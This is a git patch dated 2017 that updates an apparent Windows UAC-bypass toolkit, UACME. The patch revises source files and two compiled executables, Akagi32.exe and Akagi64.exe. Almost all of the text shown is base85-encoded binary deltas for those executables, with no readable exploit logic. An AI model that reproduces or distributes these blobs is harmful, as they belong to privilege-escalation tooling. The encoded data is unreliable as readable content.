From 2eaaa0bee2695f87f9a594114828413f67f69710 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Wed, 8 Feb 2017 10:59:23 +0700 Subject: [PATCH] v 2.5.4 little update --- Compiled/Akagi32.exe | Bin 267776 -> 267776 bytes Compiled/Akagi64.exe | Bin 314880 -> 314880 bytes README.md | 6 +++--- Source/Akagi/enigma0x3.c | 6 +++--- Source/Akagi/main.c | 8 ++++++-- UACME.sha256 | 8 ++++---- 6 files changed, 16 insertions(+), 12 deletions(-) diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe index 2afebb00392dd464e2d26d9aab6c3c8f84c6aba0..45ffa0b44bb2cf77d781d9f075de90c77b59caa0 100644 GIT binary patch delta 2739 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 diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe index 89b6238983a112aa8e72a6e737583fe3df603d97..13796fb6920a6839f766b8149a6619036f727a30 100644 GIT binary patch delta 11466 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 delta 11532 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 